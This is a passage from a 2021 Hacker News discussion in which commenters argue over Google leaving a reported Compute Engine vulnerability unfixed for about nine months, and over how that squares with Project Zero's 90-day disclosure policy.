instance. Google _did_ acknowledge the | vulnerability, as noted in the disclosure notes in the | repo. | | So like, let me just clearly list out some facts: | | * Project 0 feels that 90 days is a good timeline for the | vast majority of vulns to be patched (this is consistent | with their data, and appears accurate) | | * This issue was acknowledged by Google, though perhaps | not explicitly as a vulnerability, all that I can see is | that they ack'd it with "Good catch" - I take this as an | ack of vulnerability | | * This issue is now 3x the 90 day window that P0 | considers to be sufficient in the vast majority of cases | to fix vulnerabilities | | I don't see why other information is supposed to be | relevant. Yes, vendors in some hypothetical situation may | feel the incentive to say "WONTFIX" - that has nothing to | do with this scenario and has no bearing on the facts. | | > If you think this particular issue should have been | fixed within a given timeline, it should be on the merits | of the issue itself. | | That's not P0s opinion in the vast majority of cases - | only in extreme cases, to my knowledge, do they break | from their 90 day disclosure policy. | | > Not just by following a "everything must be fixed in 90 | days" dogma. | | Dogma here is quite helpful. I see no reason to break | from it in this instance. | | > Seems like those would have been far more interesting | discussions than a silly game of gotcha. | | I'm not saying "gotcha", I'm saying that: | | a) 9 months to fix this feels very high, Google should | explain why it took so long to restore confidence | | b) The fact that they have an internal culture of 90 days | being a good time frame for patching purely makes it | ironic - it is primarily the fact that I think this | should have been patched much more quickly that would | bother me as a customer. | | > (If you believe there is no such thing as a | vulnerability that cannot be fixed, or that's not worth | fixing, then I don't know that we'll find common ground.) | | Nope, 100% there are vulns that can't be fixed, vulns | that aren't worth fixing, etc. But again, Google didn't | say this was a "WONTFIX" though, and they did ack that | this is a vuln. If it wasn't possible to fix it they | could say so, but that isn't what they said at all, they | just said they weren't prioritizing it. | | If it's the case that this simply isn't patchable, they | should say so. If they think this doesn't matter, why not | say so? It certainly _seems_ patchable. | jsnell wrote: | > OK, but that doesn't apply here | | It's not what happened, but the logical outcome of what | you propose. Right now the rules are simple: "disclosure | in 90 days, up to you whether to fix it". What you're | proposing is that it is no longer up to the company to | make that tradeoff. They must always fix it. | | > That's not P0s opinion in the vast majority of cases - | only in extreme cases, to my knowledge, do they break | from their 90 day disclosure policy. | | Again, that is a disclosure timeline. Not a demand for a | fix in that timeline. In general it's in the vendors best | interest release a fix in that timeline, especially given | its immutability. You're trying to convert it to a demand | for a fix no matter what. That is not productive. | | > a) 9 months to fix this feels very high, Google should | explain why it took so long to restore confidence | | So why not argue for that explicitly? It seems like a | much stronger approach than the "lol PZ hypocricy" | option. | staticassertion wrote: | You're trying to talk about consequences of my statement, | which I'm trying very hard not to talk about, because I | don't care. I'm only talking about this very specific | instance. | | > Again, that is a disclosure timeline. Not a demand for | a fix in that timeline. | | Yes and it is based on the expectation of a fix within | that timeline being practical. | | > You're trying to convert it to a demand for a fix no | matter what. That is not productive. | | No I'm not, you're trying to say that I am, repeatedly, | and I keep telling you I don't care about discussing | disclosure policy broadly. I'm only talking about this | once instance. | | > It seems like a much stronger approach than the "lol PZ | hypocricy" option. | | Take that up with the person who posted about P0 | initially. I'm only saying that it's ironic and that I | support the 90 day window as being a very reasonable time | to fix things, and that them going 3x over is a bad look. | sangnoir wrote: | > Google pushes every other company to fix vulns in 90 | days (or have it publicly disclosed) | | I believe you're mistaken about the conditional | publishing. The 90 day clock starts when google reports | the bug - they _will_ make it public whether or not the | vulnerability is remediated (with very few exceptions). | By all appearances, Google is very willing to be on the | receiving end of that on the basis that _End-Users can | protect themselves when they get the knowledge_ - in this | case, GCE users are now aware that their servers are | exploitable and make changes - like moving to AWS. I | think the 90-day clock is reasonable stance to take, for | the public (but not necessarily for the vendor). | staticassertion wrote: | I'm totally aware of all of this and I strongly agree | with P0s policy. | sirdarckcat wrote: | Might be worth noting, 90 days are how long Google thinks | it is reasonable to keep vulnerabilities secret without a | fix. | | The longer it is kept secret, the benefits of the public | knowing about it outweigh the risks. | | Not all vulnerabilities can be fixed in 90 days, but they | can be disclosed. | dataflow wrote: | The complaint is that Google's stance with Project Zero | is "90 days is plenty sufficient; you're a bad vendor if | you can't adhere to it", and then Google itself doesn't | adhere to it, which implicates themselves here. | | I see what they're saying if you lump them together; I | just think it makes sense to treat P0 a little | independently from Google. But otherwise it's got a | point. | joshuamorton wrote: | Can you point out the second part, specifically where | "you're a bad vendor if..." is either stayed or implied | py P0? | | See instead | https://news.ycombinator.com/item?id=27680941, which is | my understanding of the stance p0 takes. | dataflow wrote: | > See instead | https://news.ycombinator.com/item?id=27680941, which is | my understanding of the stance p0 takes. | | That's a common sentiment I just don't buy. People here | love to hand-wave about some vague "benefit to the | public", and maybe there is some benefit when the | vulnerability can be mitigated on the user side, but it | literally _cannot_ be the case for the fraction of | vulnerabilities that entities other than the vendor can | do nothing about. The only "benefit" is it satisfies | peoples' curiosity, which is a terrible way to do | security. Yet P0 applies that policy indiscriminately. | | > Can you point out the second part, specifically where | "you're a bad vendor if..." is either stayed or implied | py P0? | | As to your question of when this is implied by P0, to me | their actions and lack of a compelling rationale for | their behavior I explained above is already plenty enough | to imply it. But if you won't believe something unless | it's in an actual quote from themselves, I guess here's | something you can refer to [1]: | | - "We were concerned that patches were taking a long time | to be developed and released to users" | | - "We used this model of disclosure for over a decade, | and the results weren't particularly compelling. Many | fixes took over six months to be released, while some of | our vulnerability reports went unfixed entirely!" | | - "We were optimistic that vendors could do better, but | we weren't seeing the improvements to internal triage, | patch development, testing, and release processes that we | knew would provide the most benefit to users." | | - "If most bugs are fixed in a reasonable timeframe (i.e. | less than 90 days), [...]" | | All the "reasonable time frame (i.e. < 90 days)", "your | users aren't getting what they need", "your results | aren't compelling", "you can do better", etc. are | basically semi-diplomatic ways of saying you're a _bad | vendor_ when you 're not meeting their "reasonable" | 90-day timeline. | | [1] | https://googleprojectzero.blogspot.com/p/vulnerability- | discl... | kerng wrote: | Both are Google - from an outside view we shouldn't | distinguish. Google should hold itself to a consistent bar. | | It highlights how divisions operate in silos at Google, and | just because Project Zero causes a lot of positive security | marketing for Google, it doesn't seem that the quality bar | is consistently high across the company. | | Also, please don't forget this is still _not_ fixed. | jonas21 wrote: | I assume they haven't fixed it yet because they don't | consider it to be severe enough to prioritize a fix. | | So the reporter waits >90 days, then publicly discloses. | Isn't this exactly how it's supposed to work? | dataflow wrote: | Funny thing is I agree with you that Google should hold | itself to that bar, but I _don 't_ agree as to Project | Zero being the reason. I think we very much _should_ | distinguish Google from P0, and that P0 's policy should | be irrelevant here; their entire purpose is to be an | independent team of security researchers finding | vulnerability in software, indiscriminately. It seems a | number of others here feel similarly (judging by the | responses), and ironically their support for the position | is probably being lost by dragging P0 into the | conversation. | | The reason I think Google should hold itself to that bar | is something else: Google _itself_ claims to use that | bar. From the horse 's mouth [1]: | | > _This is why Google adheres to a 90-day disclosure | deadline._ We notify vendors of vulnerabilities | immediately, with details shared in public with the | defensive community after 90 days, or sooner if the | vendor releases a fix. | | If they're going to do this to others as general company | policy, they need to do this to themselves. | | [1] https://www.google.com/about/appsecurity/ | sirdarckcat wrote: | Are you suggesting Google to make all unfixed | vulnerabilities public after 90 days? Would that be even | if the finder does not want them to become public? Or | just as an opt-out type of thing. | dataflow wrote: | I'm only suggesting Google needs to fix everything in 90 | days (and reveal them afterward as they consider that | standard practice) so they don't _have_ unfixed | vulnerabilities past that. I don 't really have opinions | on what policies they should have for cases where that | isn't followed, though I think of thing even _having_ a | policy for that case encourages it not to be followed to | begin with. | sirdarckcat wrote: | Vulnerability deadlines are disclosure deadlines, not | remediation deadlines. There's plenty of vulnerabilities | that can't be fixed in that time, and I think it's fair | for the public to know about them rather than keeping | them secret forever. | dataflow wrote: | "Fair to the public" was neither intended to be nor is | the concern. Their stance has always been "better for | security" and disclosing an unpatched vulnerability is | generally worse for security unless you believe it'll | encourage people to fix things by that deadline. | ithkuil wrote: | On this case knowing about this vulnerability allows you | to take corrective action. If Google cannot fix the root | cause this doesn't necessarily mean there aren't | mitigations that can be done manually by an end user (yes | it sucks, but still better than getting hacked) | dataflow wrote: | When users can mitigate it I agree with you (I forgot | about that case in the second half of my comment), but | there have also been cases when users weren't able to do | anything but they disclosed anyway, so that doesn't | explain the policy. | staticassertion wrote: | I agree - they've been really strict about this too, and have | even talked about reducing this window. To go 3x over the | window is a bad look. | VWWHFSfQ wrote: | Google doesn't hold itself to _any_ standard. At least, not | anymore. | sirdarckcat wrote: | http://g.co/appsecurity has more details but TL;DR is that | Google is supportive of people disclosing unfixed bugs after | 90 days, which is what happened here. | tptacek wrote: | If the people who reported this vulnerability had wanted to | disclose it on P0's timeline, they were presumably free to do | so. ___________________________________________________________________ (page generated 2021-06-29 23:01 UTC)